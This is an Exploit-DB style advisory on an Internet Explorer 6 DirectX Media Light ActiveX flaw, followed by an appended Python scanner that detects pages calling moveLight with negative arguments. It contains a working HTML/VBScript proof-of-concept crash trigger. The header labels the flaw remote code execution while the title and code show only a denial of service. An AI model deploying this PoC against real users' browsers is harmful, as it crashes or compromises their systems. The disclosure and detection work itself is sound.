Vendor: Internet Explorer
By: r0ut3r (writ3r [at] gmail.com)
CVSS: 9.3 (HIGH)
Remote Code Execution
CWE: 94
Product Name: Internet Explorer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

MS Internet Explorer 6 DirectX Media DoS Vulnerability

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page. This is done by supplying negative parameters to the moveLight() function, which throws an access violation.

Mitigation:

Users should avoid visiting untrusted websites and should disable ActiveX controls in their web browsers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. 

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description: 
Sub moveLight (
 	ByVal lightNum  As Long , 
 	ByVal x  As Long , 
 	ByVal y  As Long , 
 	ByVal z  As Long , 
 	ByVal fAbsolute  As Long 
)
Supplying negative parameters throws an access violation. 
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">
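
A defender-side static check for pages like the one above, added here as an example and not part of the original advisory or PoC: it flags HTML that binds an `<object>` to the Light control's CLSID and then calls `moveLight` with a negative literal argument. It goes slightly beyond the PoC by also matching the parenthesised JScript call form; the names `LightScanner`, `scan`, `SUSPICIOUS` and `BENIGN` and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the Light control, copied from the <object> tag in the PoC above.
LIGHT_CLSID = "f9efbec2-4302-11d2-952a-00c04fa34f05"
# obj.moveLight a, b, ... (VBScript) or obj.moveLight(a, b, ...) (JScript)
CALL_RE = re.compile(r"(\w+)\.moveLight\b[ \t]*\(?([^\r\n;)]*)", re.IGNORECASE)

class LightScanner(HTMLParser):
    """Collects ids of <object> tags bound to the Light CLSID, plus script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script_text, self._in_script = set(), "", False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            if clsid == LIGHT_CLSID:
                self.object_ids.add(a.get("id", "").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self.script_text += "\n"  # keep separate script bodies on separate lines

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data

def scan(html):
    """Return (object id, args) for each moveLight call with a negative argument."""
    p = LightScanner()
    p.feed(html)
    findings = []
    for obj, argstr in CALL_RE.findall(p.script_text):
        args = [x.strip().strip("\"'") for x in argstr.split(",")]
        if obj.lower() in p.object_ids and any(re.fullmatch(r"-\d+", x) for x in args):
            findings.append((obj, args))
    return findings

# Constructed sample pages (not captured traffic).
SUSPICIOUS = ('<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="L1"></object>\n'
              '<script language="vbscript">\nL1.moveLight "-1", "1", "1", "1", "1"\n</script>')
BENIGN = SUSPICIOUS.replace('"-1"', '"0"')
```

The check only sees literal arguments in inline scripts; values computed at run time or calls in external script files need a dynamic or proxy-level control instead.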